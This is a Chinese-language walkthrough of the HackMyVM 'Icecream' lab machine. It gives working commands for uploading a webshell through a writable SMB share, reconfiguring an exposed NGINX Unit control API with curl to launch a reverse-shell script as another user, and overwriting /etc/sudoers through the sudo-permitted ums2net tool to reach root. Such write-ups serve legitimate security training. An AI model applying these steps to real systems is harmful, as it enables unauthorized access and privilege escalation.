靶机下载地址:https://hackmyvm.eu/machines/machine.php?vm=Icecream
首先扫描端口。
└─$ nmap -sV -sC -Pn -p- -oN port.log 192.168.56.131
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-09 16:53 CST
Nmap scan report for 192.168.56.131
Host is up (0.0022s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 68:94:ca:2f:f7:62:45:56:a4:67:84:59:1b:fe:e9:bc (ECDSA)
|_ 256 3b:79:1a:21:81:af:75:c2:c1:2e:4e:f5:a3:9c:c9:e3 (ED25519)
80/tcp open http nginx 1.22.1 16:53:50 [45/64]
|_http-server-header: nginx/1.22.1
|_http-title: 403 Forbidden
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
9000/tcp open cslistener?
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404 Not Found
| Server: Unit/1.33.0
| Date: Wed, 09 Oct 2024 08:54:00 GMT
| Content-Type: application/json
| Content-Length: 40
| Connection: close
| "error": "Value doesn't exist."
| GetRequest:
| HTTP/1.1 200 OK
| Server: Unit/1.33.0
| Date: Wed, 09 Oct 2024 08:54:00 GMT
| Content-Type: application/json
| Content-Length: 1042
| Connection: close
| "certificates": {},
| "js_modules": {},
| "config": {
| "listeners": {},
| "routes": [],
| "applications": {}
| "status": {
| "modules": {
| "python": {
| "version": "3.11.2",
| "lib": "/usr/lib/unit/modules/python3.11.unit.so"
| "php": {
| "version": "8.2.18",
| "lib": "/usr/lib/unit/modules/php.unit.so"
| "perl": {
| "version": "5.36.0",
| "lib": "/usr/lib/unit/modules/perl.unit.so"
| "ruby": {
| "version": "3.1.2",
| "lib": "/usr/lib/unit/modules/ruby.unit.so"
| "java": {
| "version": "17.0.11",
| "lib": "/usr/lib/unit/modules/java17.unit.so"
| "wasm": {
| "version": "0.1",
| "lib": "/usr/lib/unit/modules/wasm.unit.so"
| HTTPOptions:
| HTTP/1.1 405 Method Not Allowed
| Server: Unit/1.33.0
| Date: Wed, 09 Oct 2024 08:54:00 GMT
| Content-Type: application/json
| Content-Length: 35
| Connection: close
|_ "error": "Invalid method."
...
Host script results:
|_clock-skew: -3s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-10-09T08:54:00
|_ start_date: N/A
|_nbstat: NetBIOS name: ICECREAM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
查看smb。
└─$ smbclient -L 192.168.56.131
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
icecream Disk tmp Folder
IPC$ IPC IPC Service (Samba 4.17.12-Debian)
nobody Disk Home Directories
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 192.168.56.131 (for a protocol between LANMAN1 and NT1) failed: NT_STA
TUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
发现icecream可以连接上。
└─$ smbclient //192.168.56.131/icecream
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Wed Oct 9 17:00:27 2024
.. D 0 Sun Oct 6 18:06:38 2024
systemd-private-b238b0dcf43042739385d0601be011ce-systemd-logind.service-BbUmJA D 0 Wed
Oct 9 16:50:27 2024
.font-unix DH 0 Wed Oct 9 16:50:26 2024
.XIM-unix DH 0 Wed Oct 9 16:50:26 2024
.ICE-unix DH 0 Wed Oct 9 16:50:26 2024
systemd-private-b238b0dcf43042739385d0601be011ce-systemd-timesyncd.service-E22qPs D 0
Wed Oct 9 16:50:26 2024
.X11-unix DH 0 Wed Oct 9 16:50:26 2024
19480400 blocks of size 1024. 16159828 blocks available上传一个空的html文件,发现在80端口可以访问到这个文件。
└─$ echo hello > index.html
...
smb: \> put index.html
putting file index.html as \index.html (0.8 kb/s) (average 0.8 kb/s)
...
└─$ curl http://192.168.56.131/index.html
hello上传一个shell,然后在80端口访问,得到第一个shell。
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)查看home目录,只有ice用户,下面就是看如何得到ice用户。ice用户运行着nginx unit服务,看来需要通过nginx unit得到ice。
$ ps aux|grep ice
root 378 0.0 0.1 11772 2796 ? Ss 10:50 0:00 unit: main v1.33.0 [/usr/sbin/unitd --control 0.0.0.0:9000 --user ice]
ice 515 0.0 0.1 11128 2156 ? S 10:50 0:00 unit: controller
ice 516 0.0 0.3 102424 7020 ? Sl 10:50 0:00 unit: router
ice 12861 0.0 1.0 203620 21644 ? S 11:46 0:00 unit: "app" prototype
ice 12862 0.0 0.7 220144 14692 ? S 11:46 0:00 unit: "app" application
ice 12864 0.0 0.5 220144 10404 ? Ss 11:47 0:00 unit: "app" application
ice 12865 0.0 0.0 2576 892 ? S 11:47 0:00 sh -c uname -a; w; id; /bin/sh -i
ice 12869 0.0 0.0 2576 900 ? S 11:47 0:00 /bin/sh -i先上传另一个rev2.shell到/tmp目录,然后运行以下指令,使得unit服务可以访问rev2.shell(感谢Todd)。其中,第一句加应用,第二句加路由,第三句加监听。
curl -X PUT -d '{"app":{"type":"php","root":"/tmp","script":"rev2.php"}}' http://192.168.56.131:9000/config/applications
curl -X PUT -d '[{"action":{"share":"/tmp/rev2.php$uri","fallback":{"pass":"applications/app"}}}]' http://192.168.56.131:9000/config/routes
curl -X PUT -d '{"*:8888":{"pass":"routes"}}' http://192.168.56.131:9000/config/listeners访问192.168.56.131:8888/rev2.php ,得到shell。
$ id
uid=1000(ice) gid=1000(ice) grupos=1000(ice),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev),110(bluetooth) 当然,以上指令还可以进一步精简。
└─$ curl -X PUT -d '{
"listeners": {
"*:8080": {
"pass": "applications/php-app"
}
},
"applications": {
"php-app": {
"type": "php",
"root": "/tmp",
"script": "rev2.php"
}
}
}' http://192.168.56.131:9000/config
{
"success": "Reconfiguration done."
}
└─$ curl http://192.168.56.131:8080 上传id_rsa.pub到ice/.ssh目录下并改名authorized_keys,记得将.ssh目录权限改为700,文件权限改为600。这样可以直接用ssh连接ice。查看sudo。
ice@icecream:~$ sudo -l
Matching Defaults entries for ice on icecream:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
use_pty
User ice may run the following commands on icecream:
(ALL) NOPASSWD: /usr/sbin/ums2net
研究下ums2net的用法,主要将端口输入写入任意文件。这里有诸多方法,这里覆盖/etc/sudoers。在本机建立一个sudoers文件,内容如下。
└─$ cat sudoers
ice ALL=(ALL) NOPASSWD: ALL 建立a.conf如下。
ice@icecream:~$ echo '8080 of=/etc/sudoers' > /tmp/a.conf运行ums2net。
ice@icecream:~$ sudo /usr/sbin/ums2net -c /tmp/a.conf -d然后在本机将sudoers传入8080端口。
└─$ nc 192.168.56.131 8080 < sudoers Ctrl+c中断,靶机显示接收到数据。
ice@icecream:~$ sudo /usr/sbin/ums2net -c /tmp/a.conf -d
ums2net[780]: Totally write 28 bytes to /etc/sudoers再次在靶机运行sudo -l,显示可以以root运行任何命令。
User ice may run the following commands on icecream:
(ALL) NOPASSWD: ALL最后得到root。
ice@icecream:~$ sudo bash
/etc/sudoers:2:11: error de sintaxis
with the 'visudo' command as root.
^~~~~~~~
root@icecream:/home/ice# id
uid=0(root) gid=0(root) grupos=0(root)
root@icecream:/home/ice#